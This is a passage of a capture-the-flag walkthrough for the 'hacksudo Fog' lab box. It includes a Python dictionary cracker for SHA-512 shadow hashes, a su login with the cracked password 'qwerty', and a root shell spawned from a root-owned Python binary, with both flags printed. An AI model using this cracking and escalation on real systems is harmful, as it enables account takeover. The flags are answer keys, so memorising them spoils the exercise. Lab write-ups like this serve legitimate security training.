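    fields = shadow_hash.split("$")           # '', '6', [rounds=N,] salt, digest
    if len(fields) < 4 or fields[1] != "6":
        return False
    rounds = 5000
    if fields[2].startswith("rounds="):
        rounds = int(fields[2][len("rounds="):])
        del fields[2]
    computed = sha512_crypt_digest(candidate.encode(), fields[2].encode(), rounds)
    return hmac.compare_digest(computed, fields[3])


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """The join unshadow(8) performs: passwd lines with 'x' swapped for the shadow field."""
    shadow = {}
    for line in shadow_text.splitlines():
        if line:
            user, field = line.split(":", 2)[:2]
            shadow[user] = field
    merged = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[0] in shadow:
            f[1] = shadow[f[0]]
            merged.append(":".join(f))
    return merged


def crackable(merged: Iterable[str]) -> Dict[str, str]:
    """Keep only accounts whose password field is a real $6$ hash, dropping '*', '!' and '!!'."""
    return {l.split(":")[0]: l.split(":")[1] for l in merged if l.split(":")[1].startswith("$6$")}


def crack(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Dictionary attack: first word that verifies, or None, per user."""
    words = list(wordlist)
    return {user: next((w for w in words if verify(w, h)), None) for user, h in hashes.items()}


if __name__ == "__main__":
    targets = crackable(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE))
    for user, pw in crack(targets, WORDLIST).items():
        print(f"{user}: {pw if pw else '(not in wordlist)'}")
```

This is a teaching implementation: every candidate costs 5000 chained SHA-512 calls in interpreted Python, which is why john (or hashcat) is the right tool for rockyou-sized lists. The structure is what matters: the salt is public, the iteration count is the only brake, and a password like qwerty falls to the first few thousand guesses regardless.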
Switch to isro with su, check sudo rights and read the user flag:
www-data@hacksudo:~$ su - isro
su - isro
Password: qwerty
isro@hacksudo:~$ id
id
uid=1003(isro) gid=1003(isro) groups=1003(isro)
isro@hacksudo:~$ sudo -l
sudo -l
[sudo] password for isro: qwerty
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$
isro@hacksudo:~$ cat user.txt
cat user.txt
8b64d2451b7a8f3fd17390f88ea35917
isro's home also holds a fog directory containing a root-owned binary named fog. Running it drops into a Python 2.7 interpreter, and a shell spawned from there runs as root:
isro@hacksudo:~/fog$ ls -alh
ls -alh
total 3.7M
drwxr-xr-x 2 isro isro 4.0K May 13 2021 .
drwxr-x--- 5 isro isro 4.0K May 13 2021 ..
-rwxr-xr-x 1 root isro 17K May 12 2021 fog
-rw-r--r-- 1 isro isro 0 May 6 2021 get
-rwxr-xr-x 1 isro isro 68K May 6 2021 ping
-rwxr-xr-x 1 isro isro 3.6M May 6 2021 python
isro@hacksudo:~/fog$ ./fog
./fog
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
import os
>>> os.system("/bin/bash")
os.system("/bin/bash")
root@hacksudo:~/fog# cd /root
cd /root
root@hacksudo:/root# ls -alh
ls -alh
total 44K
drwx------ 5 root root 4.0K May 10 2021 .
drwxr-xr-x 20 root root 4.0K May 9 2021 ..
-rw------- 1 root root 638 May 13 2021 .bash_history
-rw-r--r-- 1 root root 598 May 6 2021 .bashrc
drwxr-xr-x 10 root root 4.0K May 8 2021 fogproject-1.5.9
drwx------ 3 root root 4.0K May 6 2021 .gnupg
drwxr-xr-x 3 root root 4.0K May 4 2021 .local
-rw------- 1 root root 738 May 10 2021 .mysql_history
-rw-r--r-- 1 root root 178 May 4 2021 .profile
-r-------- 1 root 1000 1.5K May 6 2021 root.txt
-rw-r--r-- 1 root root 249 May 10 2021 .wget-hsts
root@hacksudo:/root# cat root.txt
cat root.txt
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' DIE `98v8P' HUMAN `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.od
b. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
great you rooted hacksudo Fog Box !!!
flag {4356a779ce18252fa1dd2d2b6ab56b19}
submit this flag at hacksudo discord https://discord.gg/vK4NRYt3
root@hacksudo:/root#
Privilege escalation succeeded and the root flag is obtained.